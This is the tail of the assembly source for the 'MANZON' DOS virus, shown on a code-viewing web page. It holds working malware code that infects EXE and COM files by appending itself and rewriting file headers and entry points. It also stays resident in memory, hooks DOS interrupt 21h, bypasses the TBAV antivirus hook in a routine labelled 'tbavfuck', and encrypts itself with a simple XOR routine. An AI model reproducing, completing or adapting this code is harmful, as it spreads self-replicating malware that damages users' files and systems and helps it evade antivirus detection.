📄 manzon.asm
字号:
mov ax,dx
shl eax,16
add eax,ecx ; Build filesize in eax
mov edx,eax ; Save filesize
xor ebx,ebx
mov bx, word ptr ds:[EXE_SHe]
shl ebx,4 ; Build real Headersize
sub eax,ebx ; Filesize-Headersize=CS:IP!!
push eax ; Save new CS:IP for later use
call FixSegOffs ; Fix CS:IP so IP<10h
mov dword ptr ds:[EXE_IP],eax
mov [entry_p],ax ; Set virus entrypoint
mov [IPOffs],-3 ; No offset in EXE-files
mov bx,[File_H]
call WriteVirus ; Write virus to EOF
xor eax,eax
xor ebx,ebx
mov ax,word ptr ds:[EXE_Mod] ; Bytes on last page
mov bx,word ptr ds:[EXE_Siz] ; Size/512
shl ebx,9 ; Mul 512
add eax,ebx ; Make progsize
add eax,filecodelength ; Add code_size
xor ebx,ebx
mov bx,word ptr ds:[CLength]
add eax,ebx ; Add decryptsize
add eax,12 ; add InitCX,Loop etc
mov ebx,eax
shr ebx,9 ; Make new progsize/512
and ax,01ffh ; Make modulo
mov word ptr ds:[EXE_Siz],bx
mov word ptr ds:[EXE_Mod],ax
add word ptr ds:[EXE_Min],(code_size+100)/16
mov word ptr ds:[EXE_Max],-1
pop eax ; Get CS:IP
xor ebx,ebx
mov bx,word ptr ds:[CLength] ; Length of decryptor
add eax,ebx
add eax,12 ; Add INIT_CX, INIT_SI etc
add eax,VirStk-Code_Start ; Add pos of Stack
inc eax ; Add one byte and...
and al,0feh ; ...make sure it's even
call FixSegOffs ; Fix so SP<10h
mov word ptr ds:[EXE_SP],ax ; Save new SS:SP
shr eax,16
mov word ptr ds:[EXE_SS],ax ; Save new SS:SP
mov bx,[File_H]
mov ax,4200h ; Go to SOF
xor cx,cx
cwd
int 21h
mov ah,40h
mov cx,18h ; Size of EXE-header
mov dx,offset EXE_Header
int 21h ; Write new header
SkipInfect:
ret
FixSegOffs:
mov ebx,eax
xor ax,ax
shl eax,12
mov ax,bx
FixSegOffsLoop:
mov bx,ax
cmp bx,10h
jb short DoneFix
add eax,00010000h - 00000010h ; 1 para up..
jmp short FixSegOffsLoop
DoneFix:
ret
id db 'MANZON (c) '
db 'R' + 1
db 'e' + 2
db 'd' + 3
db '-' + 4
db 'A' + 5
db '/' + 6
db 'I' + 7
db 'R' + 8
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:
;+ Following code will check if virus is resident, +:
;+ allocate memory, copy virus to memory, set the new +:
;+ interrupt vector and transfer control to the program +:
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:
InstallVirus:
pop si ; Get Start of virus+3
push si ; Save it again for later use.
push ds ; push PSP for later use
push cs
pop ds
;+:+:+:+:+:+:+:+:+:+: Ceck if virus is active :+:+:+:+:+:+:+:+:+:+:+:
mov ax,0DCBAh
int 21h
cmp dx,ax
je short Installed ; Virus found in memory
;+:+:+:+:+:+:+:+:+:+: Allocate memory for virus :+:+:+:+:+:+:+:+:+:+:+:
mov ah,4ah ; Get top of memory
push ax
mov bx,-1
int 21h
sub bx,(code_size)/16+2 ; Resize memory allocation
pop ax
int 21h
mov ah,48h ; Allocate memory for Virus
mov bx,(code_size)/16+1
int 21h
jc short Installed ; If error then exit
dec ax ; dec AX to get pointer to MCB
mov es,ax
mov word ptr es:[1],8 ; Set DOS as owner of memory
sub ax,0fh ; 100 bytes from allocstart
mov es,ax ; to get same offset in TSR-code
;+:+:+:+:+:+:+:+:+:+:+:+: Copy virus to memory :+:+:+:+:+:+:+:+:+:+:+:
sub si,6
mov di,0100h
mov cx,code_size
rep movsb ; move 'em up
;****** Get adress of old INT21h and save it in the Do21-jump.
push es
pop ds
mov ax,3521h
int 21h
tbavfuck:
cmp word ptr es:[bx],05ebh
jne notbav
cmp byte ptr es:[bx+2],0eah
jne notbav
les bx,es:[bx+3]
jmp tbavfuck
notbav:
mov word ptr ds:[OldInt+2],es ; Save address to real INT
mov word ptr ds:[OldInt],bx ; in the JMP-string
;****** Set new INT21h
mov dx,offset NewVect ; Set New interruptvector
mov ax,2521h
int 21h
installed:
pop ax ; Get PSP
pop si
sub si,106h
cmp word ptr cs:[si+IPoffs],100h ; Are we in a COM-file
je short RestoreComFile
RestoreExeFile:
mov ds,ax ; Let ds contain PSP
mov es,ax ; Let es contain PSP
add ax,10h ; Get start of file
add word ptr cs:[si+Real_CS],ax ; Add start seg to CS
add ax,word ptr cs:[si+Real_SS]
mov ss,ax ; Get programs SS
mov sp,word ptr cs:[si+Real_SP] ; Get programs SP
sub sp,2 ; Fix right value for SP
push word ptr cs:[si+Real_CS]
push word ptr cs:[si+Real_IP]
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
mov si,ax
mov di,ax
mov bp,ax
retf
RestoreComFile:
mov ax,cs
mov ds,ax
mov es,ax
add si,offset buffer ; Restore real 3 first bytes
mov di,0100h
movsw
movsb
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
mov si,ax
mov di,ax
mov bp,ax
push 0100h
ret
SimpleCryptEnd:
StartDecryptSimple:
call GetIPLabel
GetIPLabel:
mov bp,sp
mov si,[bp]
sub si,GetIPLabel-SimpleCryptStart
mov cx, SimpleCryptEnd-SimpleCryptStart
Call DecryptSimple
pop ax
ret
EncryptDecryptSimple:
mov si,offset SimpleCryptStart
mov cx, SimpleCryptEnd-SimpleCryptStart
call DecryptSimple
ret
DecryptSimple:
db 02eh,080h,034h ; xor byte ptr cs:[si],?
DSRan db 0
inc si
loop DecryptSimple
ret
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Following code acts like a buffer in memory, and is not :+
;+ included when the virus is written to a file. :+
;+ (Normally known as the heap) :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
filecodeend: ; Label to calculate code_size,
; and to use when jumping to copy
; of EWD-routine
ED_buf db ED_end-ED_start dup (?) ; space for copy of en EWD-routine
File_H dw ? ; Filehandle
; Space for the created decryptionroutine
InitCX1 db ?,?,? ; mov cx,virsize+(0 to 7)
InitSI1 db ?,?,? ; mov si,offset start
CCode1 dd ?,?,?,?,?,?,?,? ; 1 to 15 decryptrows
dd ?,?,?,?,?,?,?
dd ?,? ; + loop statement
; Space for the created encryptionroutine
CCode2 dd ?,?,?,?,?,?,?,? ; 1 to 15 decryptrows
dd ?,?,?,?,?,?,?
dd ?,?
EXE_Header: ; Structure
EXE_Sig dw ? ; MZ or ZM
EXE_Mod dw ? ; size - int(size/512)
EXE_Siz dw ? ; size/512
EXE_Rel dw ? ; Relocation iems
EXE_SHe dw ? ; Size of header/16
EXE_Min dw ? ; Min mem/16
EXE_Max dw ? ; Max mem/16
EXE_SS dw ? ; Stack Segement
EXE_SP dw ? ; Stack Pointer
EXE_CHK dw ? ; Checksum
EXE_IP dw ? ; Instruction Pointer
EXE_CS dw ? ; Code Segment
EXE_Win db ? ; 40h if Windows EXE
VirStk: db 32 dup (?) ; Stack used by the virus (EXE only)
code_end:
end start
;===============================================================================
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -